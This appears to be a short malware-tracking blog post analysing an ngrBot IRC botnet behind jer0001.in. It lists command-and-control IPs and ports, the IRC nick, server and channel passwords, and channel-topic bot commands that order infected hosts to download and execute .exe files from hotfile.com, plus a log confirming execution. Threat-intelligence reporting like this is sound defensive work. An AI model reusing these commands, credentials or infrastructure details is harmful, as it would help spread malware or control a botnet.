jer0001.in(ngrBot hosted in United States Razor Inc)

Very big botnet allready posted diferent domain names from this net here

Resolved : [jer0001.in] To [208.83.233.194] port 1889
Resolved : [jer0001.in] To [208.83.232.90] port 1889
Resolved : [jer0001.in] To [208.83.234.66] port 1889

HTTP Conversations:

199.15.234.7:80 – [api.wipmania.com]
Request: GET /
Response: 200 “OK”
199.7.177.218:80 – [hotfile.com]
Request: GET /dl/146860590/6c4cc0b/sgfdfa.exe
Response: 302 “Found”
74.120.11.30:80 – [s396.hotfile.com]
Request: GET /get/ea193a98752b0a12f9b89946846523faaeeb1858/4f3ec299/2/e9a6e3acb547b912/8c0ea2e/sgfdfa.exe
Response: 200 “OK”

IRC Conversations:

208.83.234.66:1889
108.59.1.230:1889
46.165.192.30:1889
85.17.219.217:1889
95.211.40.20:1889

Nick: n{US|XPa}evbnaif
Username: evbnaif
Server Pass: mflrod
Joined Channel:
Joined Channel: #zxcv with Password mflrod
Joined Channel: #US
Channel Topic for Channel : “~dw http://hotfile.com/dl/146860590/6c4cc0b/sgfdfa.exe 70bfef10e0c8d792ec5b0a4067901133”
Channel Topic for Channel #zxcv: “~pu http://hotfile.com/dl/146860597/0a721e9/17feb.exe ca04a7cebffaa9f90511b388be3dd839 ~s -o ~s”
Private Message to Channel : “[d=”http://hotfile.com/dl/146860590/6c4cc0b/sgfdfa.exe” s=”86016 bytes”] Executed file “C:Documents and SettingsAdministratorApplication Data1.exe” – Download retries: 0″

sample
sample

hosting infos:
http://whois.domaintools.com/208.83.234.66

Categories: Uncategorized